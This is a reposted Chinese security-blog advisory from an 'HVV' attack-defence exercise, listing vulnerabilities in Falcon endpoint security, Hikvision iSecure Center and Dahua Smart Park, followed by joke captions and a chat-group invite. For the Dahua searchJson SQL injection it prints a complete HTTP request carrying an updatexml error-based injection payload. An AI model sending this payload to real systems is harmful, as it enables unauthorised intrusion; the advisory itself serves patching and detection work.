HVV第二天摸鱼漏洞情报指南

admin 2023年8月11日02:25:39评论217 views字数 853阅读2分50秒阅读模式

漏洞情报

猎鹰安全科技终端安全系统 SQL 注入漏洞( XVE-2023-5913)

影响版本:version ≤ 9.0 2022.10.18.12

临时缓解措施:

使用网络 ACL 限制访问来源, 加强监测。

POC未公开

海康威视 iSecure Center 综合安防管理平台文件上传漏洞

漏洞信息:

https://x.threatbook.com/v5/vul/1f69af7477471f917b0a909d5164f8c9827953ebd6d17bb5acfd507a704f2a619e446f9c551580ed5cf43f5a27d11aaa

HVV第二天摸鱼漏洞情报指南
image.png

大华智慧园区综合管理平台 searchJson SQL注入漏洞

POC已公开

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

HVV趣闻

安恒蜜罐逃逸?你的蜜罐正发起攻击。

HVV第二天摸鱼漏洞情报指南

钓鱼?不存在的,他只是想看超短裙。

HVV第二天摸鱼漏洞情报指南

风险转移,背锅侠你好。

HVV第二天摸鱼漏洞情报指南

反差,反差?!

HVV第二天摸鱼漏洞情报指南
钓鱼?他只是想请你吃饭,顺便借你的工作机。
HVV第二天摸鱼漏洞情报指南
WPS晚上十一点自动修复,大家不用害怕了。
HVV第二天摸鱼漏洞情报指南
紧急排查!
HVV第二天摸鱼漏洞情报指南

交流群

交流群获取各种情报

HVV第二天摸鱼漏洞情报指南

①群已满,扫码添加机器人助手,回复"HW2"进入交流②群!

原文始发于微信公众号(小艾搞安全):HVV第二天摸鱼漏洞情报指南

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月11日02:25:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HVV第二天摸鱼漏洞情报指南https://cn-sec.com/archives/1948942.html

发表评论

匿名网友 填写信息